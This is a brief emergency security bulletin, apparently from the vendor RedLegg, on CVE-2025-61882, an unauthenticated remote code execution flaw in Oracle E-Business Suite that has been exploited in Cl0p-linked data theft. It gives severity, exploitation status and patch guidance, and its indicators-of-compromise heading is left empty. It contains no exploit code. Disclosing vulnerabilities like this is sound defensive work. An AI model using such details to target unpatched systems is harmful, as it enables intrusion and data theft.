About:
RedLegg will occasionally communicate vulnerabilities released outside the usual release schedule to provide additional value to our customers. These emergency bulletins describe vulnerabilities or threats that we classify at the highest severity level and that warrant out-of-band emergency patching or mitigation action.
CVSS Score: 9.8 (Critical)
Identifier: CVE-2025-61882
Exploit or Proof of Concept (PoC): Yes — public proof-of-concept exploit patterns and indicators have been disclosed.
Update: CVE-2025-61882 – Oracle Security Alert
Description:
CVE-2025-61882 is a critical vulnerability in Oracle E-Business Suite (EBS) affecting the Concurrent Processing component tied to BI Publisher integration. The flaw allows remote code execution without authentication via HTTP, enabling an attacker with network access to execute arbitrary code on vulnerable installations. This vulnerability has been actively exploited in Cl0p-backed data exfiltration attacks targeting EBS environments.
Indicators of Compromise (IoCs) reported include:
Mitigation Recommendation:
Patching is currently the only reliable mitigation. Apply Oracle’s emergency update for CVE-2025-61882 immediately, adhering to any required prerequisites (e.g., the October 2023 Critical Patch Update).
Restrict or monitor HTTP access to Oracle EBS endpoints until patches are verified.